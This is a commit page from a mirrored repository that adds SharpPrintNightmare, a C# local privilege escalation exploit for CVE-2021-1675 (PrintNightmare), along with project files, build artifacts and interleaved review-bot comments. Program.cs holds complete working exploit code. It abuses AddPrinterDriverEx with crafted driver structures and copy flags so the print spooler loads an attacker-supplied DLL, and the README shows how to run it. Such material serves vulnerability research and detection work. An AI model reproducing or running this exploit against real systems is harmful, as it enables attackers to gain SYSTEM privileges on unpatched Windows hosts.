mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-11-14 01:57:55 +00:00
c# LPE version
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
parent
69a14897dd
commit
c047c45d75
21 changed files with 298 additions and 0 deletions
BIN
Images/poc2.png
Normal file
BIN
Images/poc2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 196 KiB |
BIN
Images/poc3.png
Normal file
BIN
Images/poc3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 35 KiB |
BIN
SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
Normal file
BIN
SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
Normal file
Binary file not shown.
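Review bot: The commit adds `SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo`, a binary Visual Studio user-options file that the IDE reads when the solution is opened and that cannot be inspected on this page. In a repository that people clone specifically to study an exploit, an opaque IDE state file is a supply-chain risk for the reader rather than part of the proof of concept. The later "Binary file not shown" entries appear to be build output, since they sit next to a file list naming `bin\Release\SharpPrintNightmare.exe` and `.pdb`, and they raise the same concern. Leave `.vs/`, `bin/` and `obj/` out of the commit and list them in `.gitignore`, so that what is reviewed is what gets built.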
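--- a/SharpPrintNightmare/README.md
+++ b/SharpPrintNightmare/README.md
@@ -0,0 +1,9 @@
+# C# LPE Implementation of CVE-2021-1675
+
+### Usage
+
+```
+C:\SharpPrintNightmare.exe C:\addCube.dll
+```
+
+![](../Images/poc3.png)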
Binary file not shown.
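--- a/SharpPrintNightmare/SharpPrintNightmare/App.config
+++ b/SharpPrintNightmare/SharpPrintNightmare/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+<startup>
+<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
+</startup>
+</configuration>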
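--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@@ -0,0 +1,150 @@
+using System;
+using System.ComponentModel;
+using System.IO;
+using System.Runtime.InteropServices;
+
+namespace SharpPrintNightmare
+{
+class Program
+{
+[DllImport("kernel32.dll")]
+static extern uint GetLastError();
+
+[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
+public static extern bool AddPrinterDriverEx([Optional] string pName, uint Level, [In, Out] IntPtr pDriverInfo, uint dwFileCopyFlags);
+
+//https://www.pinvoke.net/default.aspx/winspool/EnumPrinterDrivers.html
+[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
+static extern bool EnumPrinterDrivers(String pName, String pEnvironment, uint level, IntPtr pDriverInfo, uint cdBuf, ref uint pcbNeeded, ref uint pcRetruned);
+public struct DRIVER_INFO_2
+{
+public uint cVersion;
+[MarshalAs(UnmanagedType.LPTStr)]
+public string pName;
+[MarshalAs(UnmanagedType.LPTStr)]
+public string pEnvironment;
+[MarshalAs(UnmanagedType.LPTStr)]
+public string pDriverPath;
+[MarshalAs(UnmanagedType.LPTStr)]
+public string pDataFile;
+[MarshalAs(UnmanagedType.LPTStr)]
+public string pConfigFile;
+}
+
+// 3.1.4.4.8 RpcAddPrinterDriverEx Values
+public static uint APD_STRICT_UPGRADE = 0x00000001;
+public static uint APD_STRICT_DOWNGRADE = 0x00000002;
+public static uint APD_COPY_ALL_FILES = 0x00000004;
+public static uint APD_COPY_NEW_FILES = 0x00000008;
+public static uint APD_COPY_FROM_DIRECTORY = 0x00000010;
+public static uint APD_DONT_COPY_FILES_TO_CLUSTER = 0x00001000;
+public static uint APD_COPY_TO_ALL_SPOOLERS = 0x00002000;
+public static uint APD_INSTALL_WARNED_DRIVER = 0x00008000;
+public static uint APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000;
+
+static void Main(string[] args)
+{
+string dllpath;
+if (args == null || args.Length == 0)
+{
+Console.WriteLine("Need an argument containing the dll path");
+Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll");
+Environment.Exit(0);
+}
+dllpath = args[0];
+
+Console.WriteLine("[*] Try 1...");
+addPrinter(dllpath);
+Console.WriteLine("[*] Try 2...");
+addPrinter(dllpath);
+Console.WriteLine("[*] Try 3...");
+addPrinter(dllpath);
+}
+
+static void addPrinter(string dllpath)
+{
+DRIVER_INFO_2[] drivers = getDrivers();
+string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL";
+Console.WriteLine("[*] pDriverPath Found " + pDriverPath);
+Console.WriteLine("[*] Executing C:\\addCube.dll");
+
+//DRIVER_INFO_2 Level2 = drivers[0];
+DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
+Level2.cVersion = 3;
+Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+Level2.pDataFile = dllpath;
+Level2.pDriverPath = pDriverPath;
+Level2.pEnvironment = "Windows x64";
+Level2.pName = "12345";
+
+string filename = Path.GetFileName(dllpath);
+uint flags = APD_COPY_ALL_FILES | 0x10 | 0x8000;
+
+//convert struct to unmanage code
+IntPtr pnt = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
+Marshal.StructureToPtr(Level2, pnt, false);
+
+//call AddPrinterDriverEx
+AddPrinterDriverEx(null, 2, pnt, flags);
+Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
+Marshal.FreeHGlobal(pnt);
+
+for (int i = 1; i <= 30; i++)
+{
+//add path to our exploit
+Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}";
+//convert struct to unmanage code
+IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2));
+Marshal.StructureToPtr(Level2, pnt2, false);
+
+//call AddPrinterDriverEx
+AddPrinterDriverEx(null, 2, pnt2, flags);
+int errorcode = Marshal.GetLastWin32Error();
+Marshal.FreeHGlobal(pnt2);
+if(errorcode == 0)
+{
+Console.WriteLine($"[*] Stage {i}: " + errorcode);
+Console.WriteLine($"[+] Exploit Completed");
+Environment.Exit(0);
+}
+}
+}
+
+static DRIVER_INFO_2[] getDrivers()
+{
+uint cbNeeded = 0;
+uint cReturned = 0;
+if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
+{
+//succeeds, but shouldn't, because buffer is zero (too small)!
+throw new Exception("EnumPrinters should fail!");
+}
+
+int lastWin32Error = Marshal.GetLastWin32Error();
+//ERROR_INSUFFICIENT_BUFFER = 122 expected, if not -> Exception
+if (lastWin32Error != 122)
+{
+throw new Win32Exception(lastWin32Error);
+}
+
+IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
+if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
+{
+DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
+long offset;
+offset = pAddr.ToInt64();
+Type type = typeof(DRIVER_INFO_2);
+int increment = Marshal.SizeOf(type);
+for (int i = 0; i < cReturned; i++)
+{
+printerInfo2[i] = (DRIVER_INFO_2)Marshal.PtrToStructure(new IntPtr(offset), type);
+offset += increment;
+}
+Marshal.FreeHGlobal(pAddr);
+return printerInfo2;
+}
+
+throw new Win32Exception(Marshal.GetLastWin32Error());
+}
+}
+}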
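Review bot: Program.cs has no comment recording what a run changes on the host, which is what a responder or detection engineer reading this sample needs most. In addPrinter the driver is registered under the fixed name `"12345"` for `"Windows x64"`, `pConfigFile` is pointed at `C:\Windows\System32\spool\drivers\x64\3\old\{i}\{filename}` for i = 1..30, and Main calls the routine up to three times. A header comment such as `// Observable artifacts: driver name "12345"; AddPrinterDriverEx with APD_COPY_ALL_FILES | 0x10 | 0x8000; config-file paths under spool\drivers\x64\3\old\<n>\` would make those indicators explicit. The status line `Console.WriteLine("[*] Executing C:\\addCube.dll");` also prints a fixed path rather than `dllpath`, so the console output is not a reliable record of which file was supplied; `Console.WriteLine("[*] Executing " + dllpath);` would correct it.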
|
@ -0,0 +1,35 @@
|
|||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
// set of attributes. Change these attribute values to modify the information
|
||||
// associated with an assembly.
|
||||
[assembly: AssemblyTitle("SharpPrintNightmare")]
|
||||
[assembly: AssemblyDescription("Cube0x0")]
|
||||
[assembly: AssemblyConfiguration("Cube0x0")]
|
||||
[assembly: AssemblyCompany("Cube0x0")]
|
||||
[assembly: AssemblyProduct("SharpPrintNightmare")]
|
||||
[assembly: AssemblyCopyright("Copyright © 2021")]
|
||||
[assembly: AssemblyTrademark("Cube0x0")]
|
||||
[assembly: AssemblyCulture("")]
|
||||
|
||||
// Setting ComVisible to false makes the types in this assembly not visible
|
||||
// to COM components. If you need to access a type in this assembly from
|
||||
// COM, set the ComVisible attribute to true on that type.
|
||||
[assembly: ComVisible(false)]
|
||||
|
||||
// The following GUID is for the ID of the typelib if this project is exposed to COM
|
||||
[assembly: Guid("5feb114b-49ec-4652-b29e-8cb5e752ec3e")]
|
||||
|
||||
// Version information for an assembly consists of the following four values:
|
||||
//
|
||||
// Major Version
|
||||
// Minor Version
|
||||
// Build Number
|
||||
// Revision
|
||||
//
|
||||
// You can specify all the values or you can default the Build and Revision Numbers
|
||||
// by using the '*' as shown below:
|
||||
// [assembly: AssemblyVersion("1.0.*")]
|
||||
[assembly: AssemblyVersion("1.0.0.0")]
|
||||
[assembly: AssemblyFileVersion("1.0.0.0")]
|
|
@ -0,0 +1,52 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}</ProjectGuid>
|
||||
<OutputType>Exe</OutputType>
|
||||
<RootNamespace>CVE_2021_1675</RootNamespace>
|
||||
<AssemblyName>SharpPrintNightmare</AssemblyName>
|
||||
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<Deterministic>true</Deterministic>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DefineConstants>TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
<Reference Include="Microsoft.CSharp" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Net.Http" />
|
||||
<Reference Include="System.Xml" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="App.config" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
||||
</Project>
|
|
@ -0,0 +1,25 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.31205.134
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpPrintNightmare", "SharpPrintNightmare.csproj", "{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {11E1DC60-0FB5-4AF6-86EF-EDB693E64849}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
Binary file not shown.
|
@ -0,0 +1,6 @@
|
|||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<configuration>
|
||||
<startup>
|
||||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
|
||||
</startup>
|
||||
</configuration>
|
Binary file not shown.
|
@ -0,0 +1,4 @@
|
|||
// <autogenerated />
|
||||
using System;
|
||||
using System.Reflection;
|
||||
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,4 @@
|
|||
// <autogenerated />
|
||||
using System;
|
||||
using System.Reflection;
|
||||
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
|
|
@ -0,0 +1 @@
|
|||
6a7ab24d74b7e25a7ffff290d4fe2dc8916038a2
|
|
@ -0,0 +1,6 @@
|
|||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.exe.config
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.exe
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\bin\Release\SharpPrintNightmare.pdb
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.csproj.CoreCompileInputs.cache
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.exe
|
||||
C:\CVE-2021-1675\SharpPrintNightmare\SharpPrintNightmare\obj\Release\SharpPrintNightmare.pdb
|
Binary file not shown.
Binary file not shown.